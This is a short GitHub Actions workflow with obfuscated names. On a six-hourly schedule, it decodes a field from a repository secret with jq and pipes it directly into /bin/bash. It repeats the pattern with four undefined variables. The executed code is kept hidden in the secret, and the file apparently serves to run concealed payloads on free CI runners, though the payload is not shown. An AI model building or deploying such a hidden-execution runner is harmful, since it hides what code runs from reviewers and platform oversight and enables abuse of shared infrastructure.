name: lujingxi3456

on:
  workflow_dispatch:
  schedule:
    - cron: '6 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lujingxi3456
        env:
          dvp76725: ${{ secrets.dvp76725 }}
        run: |
          echo $dvp76725 | jq -r .jjn8 | /bin/bash
          echo $gmdbp1 | jq -r .zpv631 | /bin/bash
          echo $a83231 | jq -r .akldb6655 | /bin/bash
          echo $xslp660 | jq -r .wc669 | /bin/bash
          echo $an30 | jq -r .ovph91 | /bin/bash

